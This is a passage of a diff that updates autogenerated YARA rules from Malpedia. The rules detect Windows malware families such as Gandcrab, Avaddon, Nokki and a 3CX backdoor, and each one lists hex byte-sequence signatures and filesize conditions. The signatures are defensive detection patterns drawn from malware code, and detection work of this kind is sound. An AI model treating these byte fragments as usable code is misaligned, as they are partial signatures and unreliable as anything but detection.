89a9ec000000 8b5658 } + $sequence_7 = { 8b4c2430 83c420 8d0c49 8d440804 83f808 0f87d7000000 ff248574354600 } + $sequence_8 = { 8d4c2424 51 e8???????? 8d542454 52 e8???????? 8d442470 } + $sequence_9 = { 8b4804 83f905 8954241c 7529 8b5048 55 52 } condition: - 7 of them and filesize <778240 + 7 of them and filesize <2015232 } -rule MALPEDIA_Win_Unidentified_101_Auto : FILE +rule MALPEDIA_Win_Nokki_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1e5a977c-e7e9-5732-97b6-6aadc4f691fc" - date = "2023-03-28" - modified = "2023-04-07" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_101_auto.yar#L1-L128" + id = "02120b2b-1366-521d-89f5-fe0cec012c20" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nokki_auto.yar#L1-L156" license_url = "N/A" - logic_hash = "71f0751fbd77a928634515b558d06922b4bf4a312042d6abbd6ba70171c64843" + logic_hash = "e29386a66940956320f6fdb11113fafeb375dcdfcfa05926d55033ad903bf7f3" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20230328" - malpedia_hash = "9d2d75cef573c1c2d861f5197df8f563b05a305d" - malpedia_version = "20230407" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c70016000000 e8???????? 83c8ff e9???????? 498bc4 488d0ddb070100 83e03f } - $sequence_1 = { 6689842404010000 b865000000 6689842406010000 33c0 6689842408010000 } - $sequence_2 = { 33c0 b968000000 f3aa 488d842400010000 4889442448 488d842430020000 4889442440 } - $sequence_3 = { 4889742410 57 4883ec20 418bf0 4c8d0debb40000 8bda 4c8d05dab40000 } - $sequence_4 = { c744243000000000 4c8d4c2430 4c8b442440 8b542468 488b4c2460 } - $sequence_5 = { c68424e900000065 c68424ea00000057 c68424eb00000000 c644243052 c644243165 c644243261 c644243364 } - $sequence_6 = { 428a8c1910e40100 4c2bc0 418b40fc 4d894108 d3e8 41894120 } - $sequence_7 = { 48c744242000000000 4c8d8c24c8000000 448b442450 488b542458 488b4c2470 ff15???????? } - $sequence_8 = { 41b804010000 488d942400030000 33c9 ff15???????? c744245801000000 e8???????? 833d????????01 } - $sequence_9 = { 7528 48833d????????00 741e 488d0dd8450100 e8???????? 85c0 740e } + $sequence_0 = { e8???????? 33d2 68ce070000 52 } + $sequence_1 = { e8???????? 33c9 68ce070000 51 } + $sequence_2 = { 8b420c 898d08f8ffff b9???????? 89b518f8ffff ffd0 } + $sequence_3 = { 884c0204 8b06 8bd0 83e01f c1fa05 8b149580054100 c1e006 } + $sequence_4 = { 8d8daaddffff 51 668985a8ddffff e8???????? 6800010000 8d95f0feffff 6a00 } + $sequence_5 = { 6a01 6a00 ff15???????? 8bf8 85ff 0f848a000000 6a00 } + $sequence_6 = { 51 8d9520f8ffff 52 e8???????? 83c408 85c0 744a } + $sequence_7 = { ffd6 57 ffd6 68a0bb0d00 } + $sequence_8 = { 8a8c181d010000 888888054100 40 ebe6 ff35???????? } + $sequence_9 = { 33ff ffb7d4ec4000 ff15???????? 8987d4ec4000 83c704 83ff28 } + $sequence_10 = { 83c40c 6804010000 8d95f4fdffff 52 6a00 ffd6 } + $sequence_11 = { 8d7810 89bd68e8ffff 8b8d60e8ffff 8b9564e8ffff 8d856ce8ffff 50 } + $sequence_12 = { 8bce e8???????? 33d2 6806020000 52 8d85eafdffff 50 } + $sequence_13 = { 8d8df4fdffff 51 ffd3 8d95f4fdffff 68???????? } condition: - 7 of them and filesize <402432 + 7 of them and filesize <454656 } -rule MALPEDIA_Win_Adhubllka_Auto : FILE +rule MALPEDIA_Win_Anel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e0dcc0bf-7466-5a17-86c8-1be553373dbc" + id = "77d9607f-3592-578d-9a57-0a9e2e4b1267" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.adhubllka_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.anel_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "f57dac34b065a20905904e9bce7c25f2f5dcbcedcfe53619de18c646a0c360a6" + logic_hash = "1c7f9ff41f497369b4973c110e6ba50d48e821bb90418969cf9b52dfa74f7f8e" score = 75 quality = 75 tags = "FILE" @@ -142288,32 +145123,32 @@ rule MALPEDIA_Win_Adhubllka_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8d8d60ffffff e8???????? 0f108560ffffff be18000000 0f1185c0feffff } - $sequence_1 = { 0f104590 0f118540ffffff 0f1045a0 0f118550ffffff e8???????? 83c404 8d8d60ffffff } - $sequence_2 = { 894d9c 8b4dbc 89458c 8b45c4 897d98 8b7dc0 } - $sequence_3 = { 7410 f745d800000002 7407 b801000000 eb02 33c0 } - $sequence_4 = { 03c2 898534ffffff 33c7 c1c008 898520ffffff 03c1 8b4ddc } - $sequence_5 = { 0fb605???????? c1e108 0bc8 0fb605???????? c1e108 0bc8 } - $sequence_6 = { e8???????? 83c404 0f57c0 660f138424501a0000 6a02 } - $sequence_7 = { 8d8d60ffffff e8???????? 8d8d60ffffff e8???????? 0f108560ffffff be04000000 0f118510ffffff } - $sequence_8 = { 0f1f440000 8b5cbc48 53 ff15???????? 83f801 } - $sequence_9 = { ffb590fdffff ff15???????? 85c0 0f8481fdffff 56 e8???????? } + $sequence_0 = { f7fe 43 3bd8 7621 8bd0 d1ea be91cfba01 } + $sequence_1 = { eb24 8bca 83e910 3b5904 7f17 7c07 } + $sequence_2 = { 8bf9 2bf8 85c0 7411 eb03 83c010 3bc1 } + $sequence_3 = { c645fc06 e8???????? c645fc07 8bc8 c645fc08 e8???????? 8bc6 } + $sequence_4 = { 897814 895810 89458c 8818 8d4678 } + $sequence_5 = { c1e704 037d08 a5 a5 a5 a5 5f } + $sequence_6 = { 53 33ff c645fc00 e8???????? 837d1c08 8b4508 7303 } + $sequence_7 = { 8bec 51 56 8bf0 33c0 894610 c746140f000000 } + $sequence_8 = { 8d8bd0000000 50 8d55d8 c645fc01 e8???????? 6a01 33ff } + $sequence_9 = { e8???????? 8bd6 8d8dc8feffff c645fc01 e8???????? c645fc02 83bd04ffffff05 } condition: - 7 of them and filesize <253952 + 7 of them and filesize <376832 } -rule MALPEDIA_Win_Getmail_Auto : FILE +rule MALPEDIA_Win_Miuref_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "44034b05-2864-56ad-b1e2-ce75dcdcb73e" + id = "34f2a1cb-9745-52c8-a75d-06d5cdb25bcd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.getmail_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miuref_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "cb48fd93bd0d8eb21e02a5c1c72974fd0280a8132ab759131eea2bb4b2c53aaf" + logic_hash = "0abc04edb362ffc2e411d61d44a4ba6937064194bb7ee145b0929a61d91bcae4" score = 75 quality = 75 tags = "FILE" @@ -142327,32 +145162,32 @@ rule MALPEDIA_Win_Getmail_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 896c2460 e8???????? 8d4c2420 8d9424cc000000 51 8d8424a8000000 52 } - $sequence_1 = { c68424d000000004 8b040a 813803000930 7508 8b5808 d1eb 80e301 } - $sequence_2 = { 55 ffd7 68???????? 55 a3???????? ffd7 8b0d???????? } - $sequence_3 = { 50 8b10 ff5208 391d???????? 0f84a2000000 a1???????? } - $sequence_4 = { 0f8285feffff 33db 50 e8???????? 83c404 8b442458 50 } - $sequence_5 = { c3 57 e8???????? 83c404 3bc5 89432c } - $sequence_6 = { 83f961 7208 83f97a 7703 83e957 c0e004 } - $sequence_7 = { 8d8c249c000000 8894249c000000 e8???????? 8a442413 6a00 8d8c24ac000000 c68424d400000005 } - $sequence_8 = { 8bfe 8b11 2bf8 03c5 57 50 } - $sequence_9 = { 8b8424d8000000 33db 3bc3 899c24cc000000 7505 b8???????? 8b8c24dc000000 } + $sequence_0 = { 59 59 8945fc 85f6 760e 803c072e 7418 } + $sequence_1 = { ff15???????? 50 e8???????? ff750c 8906 50 e8???????? } + $sequence_2 = { 8bf0 8d7df0 a5 a5 a5 83c418 a5 } + $sequence_3 = { 6a02 ff35???????? e8???????? 8bf0 83c40c 85f6 7412 } + $sequence_4 = { 8d8300010000 ff75fc 50 e8???????? 68???????? 8d45f8 50 } + $sequence_5 = { 8b4124 83f801 7514 ff7514 ff7510 ff750c } + $sequence_6 = { 7509 0fb74e06 663bcf 7507 33c0 e9???????? } + $sequence_7 = { e8???????? 50 ff35???????? e8???????? 83c43c e9???????? 55 } + $sequence_8 = { 8d45d8 50 a5 e8???????? 83c408 8bf0 8bfc } + $sequence_9 = { 53 53 ff15???????? 50 a3???????? e8???????? 59 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Goggles_Auto : FILE +rule MALPEDIA_Win_Vsingle_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5a06c6e9-c0df-5eb2-9be8-0912ecacc960" + id = "39c4d7b9-45d8-55fa-afdc-e3bdbe3bcacd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.goggles_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vsingle_auto.yar#L1-L182" license_url = "N/A" - logic_hash = "6adf86a94e27e4da9bbef6eb899bde95be7c68b8b1a213561e769f61dd93d169" + logic_hash = "83d89a8e2f1a1d70a66e028468bac58cc5e5d328eca56cc57ee9f6d9e54be732" score = 75 quality = 75 tags = "FILE" @@ -142363,35 +145198,41 @@ rule MALPEDIA_Win_Goggles_Auto : FILE malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { c1fa02 83e23f 8a8a10400010 880c33 } - $sequence_1 = { 51 e8???????? 8b1d???????? b941000000 33c0 } - $sequence_2 = { 8d54247c 51 52 8d842488010000 68???????? 50 } - $sequence_3 = { 6a01 51 ff15???????? 8b742430 8b542431 } - $sequence_4 = { 53 ff15???????? 83c414 33c0 85ed } - $sequence_5 = { 51 ff15???????? 83c9ff bf???????? 33c0 83c414 } - $sequence_6 = { c744241002000000 8d8c2480020000 51 ff15???????? 8b442410 5f 5e } - $sequence_7 = { ffd5 8bf0 8bc7 99 f77c242c 81ee???????? 0fbe8288410010 } - $sequence_8 = { 2bd6 56 57 03ea ffd3 57 } - $sequence_9 = { a0???????? 55 57 88442410 } + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { 83c408 8945ec 8b4dec 8b550c 8d440a01 89450c 8b4d0c } + $sequence_1 = { 8955b8 eb14 8b45c0 83c004 8945c0 8b4dbc 83c102 } + $sequence_2 = { 83c408 8985f0feffff 83bdf0feffff00 7507 33c0 e9???????? 8b95f0feffff } + $sequence_3 = { 52 680c030000 8b4508 50 } + $sequence_4 = { 83c408 8985f4eeffff 8b95f4eeffff 8995f0eeffff c745fc00000000 8b85f0eeffff } + $sequence_5 = { 8955b8 8b45d0 83c001 8945d0 837db803 7d0c 6a3d } + $sequence_6 = { 83c408 898500efffff 83bd00efffffff 7529 8b9504efffff 52 8d8524f7ffff } + $sequence_7 = { 33c0 8945e9 8945ed 8945f1 8945f5 8845f9 } + $sequence_8 = { 50 b807752b15 81f0467f1fbf 81f08c7668e6 81e8d57c5c4c 8b0c28 } + $sequence_9 = { 82e8ef e9???????? 52 53 bb4c969f2a 81f3b4d3bba6 81c3c02d0a2f } + $sequence_10 = { 81c7745e2200 81c736b60a42 81c7b551a68d 81f7e7564bc6 897c2404 } + $sequence_11 = { bbf93d64ba 81f345ba76fc 81f381c713f5 81f34d7b2ffd 81f346dc0990 81c33217d821 8b142b } + $sequence_12 = { 5b 57 50 b86a45ae9f 81c07b6673f5 81f081118d0d } + $sequence_13 = { bb86d72160 e9???????? 59 51 b9cf4a22af } + $sequence_14 = { 81eb96c3a483 668b0c18 5b 53 bbd7e0d126 81f3b7cf22ba 81c3282d094f } + $sequence_15 = { e9???????? bf756ddf55 81f7960c0426 eb36 81c7745e2200 81c736b60a42 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <940032 } -rule MALPEDIA_Win_Apocalipto_Auto : FILE +rule MALPEDIA_Win_Shujin_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ee7a0f0d-5a8b-59ea-a6c9-35fc5d51d457" + id = "20683034-d09a-5705-9d80-d7edf3a7d88d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.apocalipto_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shujin_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "ab10b935b7f8e9ea80933c4818fa1b5859216a7e2d022a7818f118074140bb2a" + logic_hash = "b1da2f105214e6f844dccb186e5a1748a5be3983c376113a3f54dc8e70f99c20" score = 75 quality = 75 tags = "FILE" @@ -142405,32 +145246,32 @@ rule MALPEDIA_Win_Apocalipto_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 880e b967666666 89d8 f7e9 89d1 c1f902 } - $sequence_1 = { 8817 41 47 39f1 75f5 c6040800 5b } - $sequence_2 = { c7042400000000 ff15???????? 52 8985ccf3ffff e8???????? 2500f0ffff 8d9800f0ffff } - $sequence_3 = { 8b5584 29f2 89542404 893c24 e8???????? c745e400000000 } - $sequence_4 = { 8b4154 89442408 895c2404 893424 } - $sequence_5 = { 83ec2c 8b4d08 8b450c 85c0 0f849d000000 } - $sequence_6 = { e8???????? 8d95e8f7ffff 89542404 893c24 e8???????? 89c2 85c0 } - $sequence_7 = { 8d3c10 31c9 8a140b 8817 } - $sequence_8 = { 891c24 ff15???????? 83ec08 a3???????? 85c0 0f8497080000 } - $sequence_9 = { 0f84cb080000 c7442404???????? 891c24 ff15???????? 83ec08 a3???????? 85c0 } + $sequence_0 = { e8???????? ff7660 8b1d???????? 6a01 bf80000000 57 } + $sequence_1 = { ff15???????? 85c0 0f8431010000 53 897df4 } + $sequence_2 = { 6aff 50 ff15???????? 57 8b7d10 83ff01 } + $sequence_3 = { 8bf9 ba???????? 0fb67201 8a0a 8b1f d3e3 0fb60c06 } + $sequence_4 = { 83615400 53 56 57 8d7108 c7450805000000 8b46f8 } + $sequence_5 = { ff45f8 817df870170000 72c9 e9???????? 807daa01 8b45e8 8d1c06 } + $sequence_6 = { 8b5508 0facc21a c1f81a 8bd8 8955e4 } + $sequence_7 = { c1ef10 8d8d9cf9ffff 2bf9 03f8 a0???????? a801 7421 } + $sequence_8 = { 895008 8b680c 8bd5 896c2410 } + $sequence_9 = { 8d1c06 83c40c 8975f8 3bf3 731e } condition: - 7 of them and filesize <212992 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE +rule MALPEDIA_Win_Gandcrab_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "28fbb43b-1b49-58bb-9ada-865931dff5e6" + id = "8fb97f0d-f07e-528f-846a-617ae03e5a0b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.3cx_backdoor_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gandcrab_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "c22c772229b5508424567ef1d7e35b9960a69d5aa0f1d8dfccaad31a703d6c0c" + logic_hash = "51f7c1543a06dc758514ed4496666d6ea311b3c69b16117153a658edbbb8509b" score = 75 quality = 75 tags = "FILE" @@ -142444,32 +145285,32 @@ rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc8 c1e907 33c1 81c287d61200 8bc8 c1e116 33c1 } - $sequence_1 = { 84d2 7430 3811 742c e8???????? c70016000000 } - $sequence_2 = { 8bfb 48895c2430 4c89742428 4983e7f0 4d8d243f 498d442410 } - $sequence_3 = { 4a0fbe841940250300 428a8c1950250300 482bd0 8b42fc d3e8 49895108 41894118 } - $sequence_4 = { 4c8bce 4c8bc5 488bd7 498bcf e8???????? 498bc6 488b5c2460 } - $sequence_5 = { 498bd7 4489642448 48897c2440 44894c2438 4c8d4d97 4889442430 4489642428 } - $sequence_6 = { 7428 85db 7524 488d0d7ef90200 e8???????? 85c0 7510 } - $sequence_7 = { 4889742458 488b7108 33d2 488bce 48c1eb05 492bc9 } - $sequence_8 = { 4983c708 4533d2 32d2 4c897c2420 80fb30 7512 b201 } - $sequence_9 = { 0fb608 880a 488d5210 488b4808 48894af8 448820 } + $sequence_0 = { ff15???????? ff7728 8bf0 ff15???????? 03c3 8d5e04 } + $sequence_1 = { 7403 83c314 837f7400 741b ff777c ff15???????? ff7778 } + $sequence_2 = { 8d5e04 03d8 837f2400 741b ff772c } + $sequence_3 = { ff774c 8bf0 ff15???????? 03c3 8d5e04 03d8 } + $sequence_4 = { 03c3 8d5e04 03d8 837f5400 741b } + $sequence_5 = { 03c3 8d5e04 03d8 837f3000 741b } + $sequence_6 = { ff774c 8bf0 ff15???????? 03c3 8d5e04 } + $sequence_7 = { 837f1800 741b ff7720 ff15???????? } + $sequence_8 = { 03d8 837f6000 7403 83c314 837f7400 741b ff777c } + $sequence_9 = { ff15???????? 03c3 8d5e04 03d8 837f3000 } condition: - 7 of them and filesize <585728 + 7 of them and filesize <1024000 } -rule MALPEDIA_Win_Deputydog_Auto : FILE +rule MALPEDIA_Win_Avaddon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3ae1b77f-6003-5f42-85fd-2473ea8bd4ab" + id = "63f23353-9bc4-58e9-928a-ae89a2672871" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deputydog_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avaddon_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "027f4c297ed3d9095922a3567db93a8700528916bc6b48fe318198129cac1716" + logic_hash = "a18db52df950b60c5b6d6008b561a4d13093802e02b6d570e4f6e8e4ed4f56e8" score = 75 quality = 75 tags = "FILE" @@ -142483,32 +145324,32 @@ rule MALPEDIA_Win_Deputydog_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 56 8bf1 8b461c 8d4e18 ff30 8d45fc } - $sequence_1 = { 85ff 7407 8b5510 8a12 8817 } - $sequence_2 = { 53 8d4de0 ff15???????? 807df300 7509 } - $sequence_3 = { 57 56 e8???????? 83c40c 8d4604 c60664 50 } - $sequence_4 = { 8d4580 50 e8???????? 8b4004 59 3bc3 59 } - $sequence_5 = { 6a00 56 ff7604 50 ff15???????? 8365f000 6800200000 } - $sequence_6 = { 8b7e08 8d1419 397d08 7417 8bc2 2bc1 2bc3 } - $sequence_7 = { 8b4d0c 57 ff30 6a00 ff15???????? 8b7d08 8b4f04 } - $sequence_8 = { 53 51 ff75e4 50 ff7618 ff15???????? 8b3d???????? } - $sequence_9 = { 57 50 ff15???????? 59 84c0 59 740b } + $sequence_0 = { 55 8bec 83e4f8 8b11 83ec14 0faf5104 53 } + $sequence_1 = { 52 50 e8???????? 8bf0 8bfa 8b4508 03f3 } + $sequence_2 = { 8d4dcc e9???????? 8d4d88 e9???????? 8d4db4 e9???????? 8d4de4 } + $sequence_3 = { 8b4df0 e9???????? 8d4dbc e9???????? 8b542408 8d420c 8b4ac0 } + $sequence_4 = { 57 56 e8???????? 83c408 85c0 7535 837e6402 } + $sequence_5 = { 8bd0 e8???????? 8b5604 83c404 } + $sequence_6 = { ff75b4 e8???????? 83c408 47 897dac 81fffe000000 0f8654feffff } + $sequence_7 = { 8bc8 2bce 0fafcb 890a 83c204 8b4de4 41 } + $sequence_8 = { 034b08 4e 8b4588 6a00 52 51 56 } + $sequence_9 = { 8d4dd8 e8???????? c645fc0d 8b4f14 3b4f18 7437 c7411000000000 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <2343936 } -rule MALPEDIA_Win_Deltas_Auto : FILE +rule MALPEDIA_Win_Scranos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7da5df4e-29e3-54c4-9a20-6a6e85d7900e" + id = "366bbb3b-fd76-5e48-ad2c-11dfe56c53aa" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deltas_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scranos_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "dd0f3991acf6e3d198b5d6cf834071e4c8ad802b2fea2e9cf5d21d8d4fb219f6" + logic_hash = "5a9a306a889eeb594e8f9ae05b85780def5b0ff2c4ea6f54823c4b6d5baa27b1" score = 75 quality = 75 tags = "FILE" @@ -142522,32 +145363,32 @@ rule MALPEDIA_Win_Deltas_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d542434 898424d8000000 52 ffd6 898424d0000000 8d442458 50 } - $sequence_1 = { b22e b06c 51 c644240c77 c644240d73 c644240f5f c644241033 } - $sequence_2 = { c684241002000000 f3ab 66ab aa 8d442408 6804010000 50 } - $sequence_3 = { 8d742438 8dbc24f4000000 33c0 f3a5 b908000000 8d7c2418 } - $sequence_4 = { 68???????? 68???????? 50 ffd7 8d8c241c020000 6804010000 8d94241c010000 } - $sequence_5 = { 57 33f6 b922000000 33c0 } - $sequence_6 = { 52 ffd6 898424e0000000 8d442440 50 ffd6 } - $sequence_7 = { 894c242d 56 66894c2435 33f6 89442420 884c2437 57 } - $sequence_8 = { 0bc1 33c7 0344242c 8d8410442229f4 8bd0 c1e006 c1ea1a } - $sequence_9 = { c644245400 c684245801000000 f3ab 66ab } + $sequence_0 = { e8???????? 83c404 8b55cc 8d440201 8945cc ebb5 8b4de4 } + $sequence_1 = { 8b8e70010000 8d542430 52 8b966c010000 8d442438 50 8d86b0030000 } + $sequence_2 = { eb13 8b4608 8b4e04 8b16 50 51 52 } + $sequence_3 = { e8???????? 83c428 e9???????? 8b55ec 8b42e4 50 8b4df4 } + $sequence_4 = { e8???????? 83c40c 85c0 0f8515070000 8b54241c 52 56 } + $sequence_5 = { 89834c010000 7523 8b542410 52 8d442420 50 8d8bc8000000 } + $sequence_6 = { 8b4d24 e8???????? 8945a0 8b4da0 894d9c c745fc00000000 8d55ac } + $sequence_7 = { 8b55e8 8b849544ffffff 89448d8c 8b4de8 8b948d30ffffff 8b4248 8b4de8 } + $sequence_8 = { 8b6c2410 57 8b7d00 8b87840c0000 81c7680c0000 8d4f0c 8944240c } + $sequence_9 = { c645fc00 8d4dc8 e8???????? c745fcffffffff 8d4da8 e8???????? 8b4594 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <2859008 } -rule MALPEDIA_Win_Romcom_Rat_Auto : FILE +rule MALPEDIA_Win_Krdownloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "38f54401-b8aa-5a45-84bf-23c46fbb1d9b" + id = "5a82ae0a-fad8-52ec-9981-5ad40d1aeb9f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.romcom_rat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.krdownloader_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "0162bd825b9587687f6d0e11e69966dd0894464ab2922749a2bae5afcccbf5b8" + logic_hash = "4501a2b9e4a10b142f4eeab904974c078e1ef98420195596ba39d05922e3a30d" score = 75 quality = 75 tags = "FILE" @@ -142561,32 +145402,32 @@ rule MALPEDIA_Win_Romcom_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b910000000 e8???????? 488945a0 4885c0 7410 44897008 488d0d6fc20400 } - $sequence_1 = { d3e8 49895108 418901 49895110 0fb60a 83e10f 4a0fbe8401a0ac0600 } - $sequence_2 = { 488d95e0310000 488d4dc0 e8???????? 448bc6 33d2 488d8de0310000 e8???????? } - $sequence_3 = { 488b01 488b4030 ff15???????? 83f8ff 7406 41884709 eb03 } - $sequence_4 = { 482bc1 4883c0f8 4883f81f 0f877d030000 e8???????? 488d4580 48837d9808 } - $sequence_5 = { 8a4709 3a4508 744b 84c9 7542 488b0f 4885c9 } - $sequence_6 = { 488d0dbac50400 488908 eb03 498bc6 4c8bc3 488bd0 488bcf } - $sequence_7 = { eb04 4d895d00 b801000000 41884508 488b542468 eb05 b801000000 } - $sequence_8 = { f20f10fc f20f58cc f20f10d1 f20f10c1 4c8d0d39090300 f20f101d???????? f20f100d???????? } - $sequence_9 = { 7510 488d0d12c90500 e8???????? 85c0 742e 32c0 eb33 } + $sequence_0 = { c645e161 c645e22e c645e370 c645e468 c645e570 c645e63f c645e76d } + $sequence_1 = { 8b4df4 8b09 e8???????? 8945f0 } + $sequence_2 = { 7528 8b45fc 0345f4 0fb6482c 51 68???????? } + $sequence_3 = { e8???????? 8945d8 8b4dfc 51 8b55f8 } + $sequence_4 = { 7418 8b4dec 0fbe11 0fbe45f3 3bd0 } + $sequence_5 = { 8955f0 8b45f0 8945f8 c745d800000080 817d1000000080 7310 } + $sequence_6 = { c745f001000000 eb28 837d0c00 7422 6a04 68???????? 8b4d0c } + $sequence_7 = { 89815c0d0300 8b55fc 8b82500d0300 50 ff15???????? } + $sequence_8 = { 735e 8b4dfc 8b5134 83ea01 3955f4 } + $sequence_9 = { 83c001 8945fc 817dfc6f020000 7d63 8b4dfc 8b55f8 } condition: - 7 of them and filesize <1211392 + 7 of them and filesize <352256 } -rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE +rule MALPEDIA_Win_Tigerlite_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0f9f82cd-fdec-56a7-a0cb-1e9762492ad7" + id = "aa691ec3-b883-5f5c-8994-9e33da37724e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.keylogger_apt3_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite" + source_url = 